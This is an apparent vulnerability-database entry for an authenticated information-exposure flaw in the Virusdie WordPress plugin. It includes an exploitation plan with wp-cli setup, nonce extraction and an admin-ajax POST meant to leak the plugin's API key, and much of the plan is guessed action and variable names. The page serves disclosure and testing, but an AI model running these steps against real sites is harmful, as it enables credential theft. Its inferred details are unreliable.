Virusdie <= 1.1.6 - Authenticated (Subscriber+) Information Exposure
Description
The Virusdie – One-click website security plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
<=1.1.6Source Code
WordPress.org SVNThis research plan outlines the process for investigating and exploiting **CVE-2025-68576** in the Virusdie plugin. Since specific source code was not provided, this plan relies on the vulnerability description and common patterns in the Virusdie plugin architecture. --- ### 1. Vulnerability Summa…
Show full research plan
This research plan outlines the process for investigating and exploiting CVE-2025-68576 in the Virusdie plugin. Since specific source code was not provided, this plan relies on the vulnerability description and common patterns in the Virusdie plugin architecture.
1. Vulnerability Summary
The Virusdie plugin (<= 1.1.6) contains a sensitive information exposure vulnerability. It allows authenticated users with Subscriber-level permissions to access data that should be restricted to Administrators. This typically occurs because an AJAX handler or REST API endpoint performs a nonce check but fails to perform a capability check (e.g., current_user_can('manage_options')), or uses a capability that is too low.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php(inferred) or a REST API route underwp-json/virusdie/v1/(inferred). - Vulnerable Action: Likely an AJAX action registered via
wp_ajax_(e.g.,virusdie_get_data,virusdie_get_settings, orvirusdie_account_info). - Authentication: Subscriber-level user required.
- Payload: An HTTP POST request to the AJAX endpoint with the correct
actionandnonceparameters. - Exposed Data: Likely includes the Virusdie API Key, Site Unique ID, or internal plugin configuration state.
3. Code Flow (Inferred)
- Entry Point: An AJAX request is sent to
admin-ajax.phpwithaction=virusdie_.... - Hook Registration: The plugin registers the action:
add_action('wp_ajax_virusdie_get_settings', 'virusdie_get_settings_callback'); - Vulnerable Function: The callback function (e.g.,
virusdie_get_settings_callback) is executed. - Missing Check: The function likely calls
check_ajax_referer('virusdie_nonce', 'nonce')but lacksif (!current_user_can('manage_options')) wp_die();. - Information Leak: The function retrieves options using
get_option('virusdie_api_key')and returns them in a JSON response viawp_send_json_success().
4. Nonce Acquisition Strategy
The Virusdie plugin enqueues its settings scripts in the WordPress admin area. Since Subscribers can access the wp-admin/profile.php or the main dashboard, they may be able to see the localized scripts.
- Identify Shortcode/Page: Virusdie usually enqueues scripts on its own settings page. However, nonces are often localized globally in the admin area.
- JS Variable Identification (Inferred): Look for
wp_localize_scriptin the plugin source (likely in a file likevirusdie.phporincludes/class-virusdie-admin.php).- Expected JS Object:
vd_dataorvirusdie_obj. - Expected Nonce Key:
nonceorajax_nonce.
- Expected JS Object:
- Strategy:
- Log in as a Subscriber.
- Navigate to
/wp-admin/index.php. - Use
browser_evalto extract the nonce:browser_eval("window.vd_data?.nonce").
5. Test Data Setup
- Plugin Installation: Install and activate Virusdie version 1.1.6.
- Configuration: Configure the plugin with a dummy API Key to ensure there is sensitive data to expose.
wp option update virusdie_api_key "VULNERABLE-API-KEY-12345" wp option update virusdie_unique_id "SITE-ID-999" - User Creation: Create a Subscriber-level user.
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
6. Exploitation Strategy
Step 1: Discover the exact AJAX action
Since the source is not provided, the agent must first find the vulnerable action name.
grep -rn "wp_ajax_" /var/www/html/wp-content/plugins/virusdie/
Look for actions that don't have a corresponding wp_ajax_nopriv_ (as the vulnerability is authenticated) and perform "get" operations.
Step 2: Acquire the Nonce
Login as the Subscriber and extract the nonce from the admin dashboard.
- URL:
http://localhost:8080/wp-login.php - Navigate to:
http://localhost:8080/wp-admin/index.php - Action:
browser_eval("window.virusdie_settings?.nonce")(Replacevirusdie_settingswith the actual variable found in Step 1).
Step 3: Trigger Information Exposure
Send the AJAX request using the http_request tool.
- Method:
POST - URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=[VULNERABLE_ACTION]&nonce=[NONCE](e.g.,action=virusdie_get_settings&nonce=abc123def)
7. Expected Results
A successful exploit will return a JSON object (200 OK) containing sensitive configuration strings:
{
"success": true,
"data": {
"api_key": "VULNERABLE-API-KEY-12345",
"unique_id": "SITE-ID-999",
"email": "admin@example.com"
}
}
If the response contains the API key while authenticated as a Subscriber, the vulnerability is confirmed.
8. Verification Steps
After the HTTP request, verify the leaked data matches the database:
wp option get virusdie_api_key
Compare the output of this command with the api_key found in the HTTP response.
9. Alternative Approaches
- REST API Check: If no AJAX actions are found, search for
register_rest_route.
Check thegrep -rn "register_rest_route" /var/www/html/wp-content/plugins/virusdie/permission_callback. If it returns__return_trueor checks foris_user_logged_in(), it is vulnerable. - Direct Option Leak: Check if the plugin uses
wp_localize_scriptto pass the actual API key to the frontend/admin JS for all users, instead of just the nonce. This is a common form of Information Exposure.grep -rn "wp_localize_script" /var/www/html/wp-content/plugins/virusdie/ -A 10
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.